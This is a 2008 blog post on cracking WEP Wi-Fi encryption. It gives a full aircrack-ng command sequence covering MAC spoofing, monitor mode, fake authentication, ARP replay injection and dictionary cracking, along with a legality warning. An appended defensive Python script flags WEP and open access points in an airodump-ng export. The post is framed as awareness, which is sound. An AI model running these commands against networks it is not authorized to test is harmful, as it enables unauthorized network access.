How To Crack WEP Encryption

Mon, 01 Sep 2008 10:12:56 EST

Something I have always wanted to do but never took the time for until recently was to learn how to crack WEP encryption. I can remember scurrying from class to class in college nearly two years ago while listening to Security Now with Leo Laporte and Steve Gibson explaining just how badly WEP had been compromised. After taking a few hours yesterday to read up on the subject, I was able to break the WEP encryption on my own router in a matter of minutes (using a weak passphrase). The process is now so easy for the kinds of phrases that non-security-conscious users pick that I think my little sister could do it. The methodology I used requires that the passphrase be contained in the dictionary file of the software you are using to crack the encryption. I have decided to re-post the method I used to demonstrate how easy it is and to encourage people NOT to use WEP encryption.

The popular Cain and Abel software for Windows can't do this without the purchase of a 100 special-chipset wireless card (it's BS, they must have a partnership with the wireless card vendor), so you can't use Windows.

Go grab yourself a copy of Backtrack3; it comes as an ISO file. You use a CD burning program to write this ISO to a CD-R. You then start your computer with this disc in the CD drive and instruct your computer to boot from it. Backtrack will run without installing anything on your computer.

Once you have Backtrack3 running and it seems to be working, the rest is cake. There is actually a Youtube video that I followed that worked perfectly. It's titled "Crack wep CLIENTLESS with backtrack3".

NOTE: Your wireless card probably isn't "wlan0" as his is in the video. Mine was on eth1. You can check this using some of Backtrack's utilities in the "Internet" menu item. Also, in Linux you can hold Control + C to stop a running program. For example, after I get the BSSID in step 3, I use Control + C to stop airmon-ng.

So here is a list of the commands he uses:


macchanger --mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

airodump-ng wlan0 (get the channel, BSSID, and ESSID you want to test)

airodump-ng -c (channel) -w (filename to write to) --bssid (the bssid) wlan0

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0 (get 100,000 data to be safe)

aircrack-ng (filename that was written to)


That's it! Remember that it is ILLEGAL to break encryption on a network that is not your own. I would, however, get your friend's permission to break their encryption in order to show them just how insecure WEP is.
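The command list above really has two parts: an inventory step (airodump-ng shows the channel, BSSID, ESSID and encryption type of every access point in range) and then the attack itself. For a defender the inventory step is the useful one, because it tells you which of your own access points still advertise WEP, or no encryption at all. The script below is an added example, not code from the original post or from the aircrack-ng project. It parses the access-point block of an airodump-ng style CSV export (the -w option in the commands above writes one) and reports every network whose Privacy column is WEP or OPN. The column layout follows airodump-ng's CSV output as I know it; the rows in SAMPLE_CSV are constructed, with made-up BSSIDs and ESSIDs.

```python
"""Flag access points that still use WEP (or no encryption) in an
airodump-ng style CSV export.

Added example, not code from the original post. The column layout is the
airodump-ng CSV layout as assumed here; the sample rows are constructed.
"""
import csv
import io

# Constructed sample in the airodump-ng CSV layout. BSSIDs and ESSIDs are
# made up; the three rows cover a WEP, a WPA2 and an open network.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2008-09-01 10:00:00, 2008-09-01 10:05:00,  6,  54, WEP , WEP, OPN, -40, 120, 3400,   0.  0.  0.  0,   8, homewifi,
00:11:22:AA:BB:02, 2008-09-01 10:00:00, 2008-09-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  98,    0,   0.  0.  0.  0,   9, officenet,
00:11:22:AA:BB:03, 2008-09-01 10:00:00, 2008-09-01 10:05:00,  1,  54, OPN , , , -70,  33,    0,   0.  0.  0.  0,   5, guest,
"""

# Privacy values that should not appear on any access point you are responsible for.
WEAK = {"WEP", "OPN"}


def parse_access_points(text):
    """Return the access-point block of an airodump-ng CSV as a list of dicts.

    airodump-ng writes two blocks (access points, then stations) separated by
    a blank line; only the first block is read here.
    """
    ap_lines = []
    for line in text.splitlines():
        if not line.strip():
            break
        ap_lines.append(line)
    # skipinitialspace handles the ", " separators airodump-ng uses.
    reader = csv.DictReader(io.StringIO("\n".join(ap_lines)), skipinitialspace=True)
    rows = []
    for row in reader:
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k})
    return rows


def find_weak_aps(rows):
    """Return one finding per access point whose Privacy column is WEP or OPN.

    Each finding carries the fields the post says to note (channel, BSSID,
    ESSID), the number of IVs already captured, and the remediation.
    """
    findings = []
    for r in rows:
        # airodump-ng may list several schemes ("WPA2 WPA"); the first is the strongest.
        privacy = r["Privacy"].split()[0] if r["Privacy"] else "?"
        if privacy in WEAK:
            findings.append({
                "bssid": r["BSSID"],
                "essid": r["ESSID"],
                "channel": int(r["channel"]),
                "privacy": privacy,
                "ivs_seen": int(r["# IV"]),
                "action": "migrate to WPA2 (CCMP) with a long random passphrase",
            })
    return findings


if __name__ == "__main__":
    for f in find_weak_aps(parse_access_points(SAMPLE_CSV)):
        print(f"{f['privacy']:4} ch{f['channel']:>2} {f['bssid']} {f['essid']!r}: {f['action']}")
```

Point it at the CSV airodump-ng writes during a survey of your own site instead of SAMPLE_CSV. Anything it reports should be moved to WPA2 with a long, random passphrase, which also removes the dictionary weakness this post relies on.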

Charles Palen has been involved in the technology sector for several years. His formal education focused on Enterprise Database Administration. He currently works as the principal software architect and manager at Transcending Digital, where he can be hired for your next contract project. Charles is a full-stack developer who has been on the front lines of small business and enterprise for over 10 years. Charles's current expertise covers the areas of .NET, Java, PHP, Node.js, Javascript, HTML, and CSS. Charles created Technogumbo in 2008 as a way to share lessons learned while making original products.

Comments

Eric
October 16, 2008 2:32 pm

HAHA! That's awesome, Chuck. I've thought about reading up on this just for the sake of feeling hacky, but never took the time. Nice post.